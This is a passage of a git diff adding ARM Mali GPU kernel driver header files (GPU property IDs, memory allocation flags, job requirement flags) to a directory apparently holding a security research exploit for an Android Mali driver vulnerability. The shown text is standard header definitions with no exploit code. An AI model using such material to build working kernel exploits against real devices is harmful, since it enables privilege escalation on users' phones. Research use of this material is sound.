+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
new file mode 100644
index 0000000..b1cf438
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
@@ -0,0 +1,1216 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include <linux/types.h>
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47<<PAGE_SHIFT for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
